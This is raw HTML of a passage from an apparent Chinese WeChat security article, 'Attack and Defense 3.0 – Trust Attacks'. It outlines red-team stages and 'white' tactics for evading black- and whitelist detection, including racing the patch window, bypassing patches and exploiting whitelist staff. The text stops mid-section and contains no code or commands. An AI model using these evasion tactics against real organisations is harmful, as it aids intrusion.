-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span><o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484208">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9bb02867&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484208%26idx%3D1%26sn%3De10570e192ad1dd52f19aa6fbc2c1505%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 03 Feb 2025 06:16:00 +0800</pubDate>
    </item>
    <item>
      <title>攻防3.0 - 信任攻击</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484194&amp;idx=1&amp;sn=cb404b0fcfa2490d458d482fa704e98a</link>
      <description>饱和攻击、对抗攻击、信任攻击；白能力</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2025-01-12 21:21</span> <span style="display: inline-block;">北京</span>
</p>

<p>饱和攻击、对抗攻击、信任攻击；白能力</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=5f3c5271&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtLTs2RAMgQOGohbItgvWCOd2QJ628UjIegRiaArrrnvrLVXWZQEU9iaJo86aeShAiaIMCdd1lWzqicEog%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(255, 0, 0);">Author: sm0nk@深蓝攻防实验室</span></span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">上周在一个技术沙龙我分享了一个攻防相关议题——</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">进击的白巨人</span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">，在此归档。</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><section style="text-align: center;" nodeleaf=""><img data-imgfileid="100000545" class="rich_pages wxw-img" data-ratio="0.5805555555555556" data-s="300,640" data-type="png" data-w="1080" style="height: auto !important;" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=9d5a3f95&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLTs2RAMgQOGohbItgvWCOdl6viarggZ3BYfEjzI6QVW7thz4bBozbdDQNEg0hT6LhyzpvmkPav9EQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></section><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">1. </span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">进攻场景思考</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></h1><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">无论是端侧产品还是流量侧产品、亦或是原生安全还是外挂式，主模式还是鉴黑和鉴白；</span></p></li><li><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">随着防守方强化的安全建设，安全产品越来越强，进攻的难度在增加；</span></p></li><li><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">但攻击方仍然有可乘之机，如何能躲避鉴黑或者鉴白呢？</span></p></li></ol><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">   </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2. </span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">攻击版本迭代</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">   </span> </span></h1><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">v1.0 </span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">饱和攻击</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">阶段，捏软柿子、大扫描</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">v2.0 </span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">对抗攻击</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">阶段，泛化0day和社工 能力，静默 隐匿 无感</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">v3.0 </span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">信任攻击</span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">阶段，不攻击的攻击，泛化“白”能力（不战而屈人之兵）</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;"><span leaf=""><img style="width: 553.340027px;height: auto !important;" class="rich_pages wxw-img" data-ratio="0.22777777777777777" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a9628edf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLTs2RAMgQOGohbItgvWCOdel3291xlFTWCf42f8CKN5xOHpO2wJsib7FhUR30nprcqZfF2SJqqNRQ%2F640%3Fwx_fmt%3Dpng"/></span></span><span style="font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;font-variant:normal;text-transform:none;mso-ansi-language:EN-US;mso-fareast-language:ZH-CN;"></span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><p style="text-align: left;text-indent: 21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">下面我们从红队的各个模块：信息收集、Web渗透、社工钓鱼、木马&amp;维持、内网横向、目标获取 ，有哪些“白”手法：</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span><o:page></o:page></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3. </span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">信息收集</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">  </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">  </span></h1><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">1. 攻击方帮助防守人员盘存资产</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">资产动态监控</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">例如新增的域名资产、IP资产、端口资产、新增功能等</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">漏洞空窗期</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">修复新的0day需要一段时间，无论长短，抢时间</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">②</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">甚至补丁的bypass，导致没有补丁</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">2. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">体悟白名单人员工作难点（正难则反）</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, 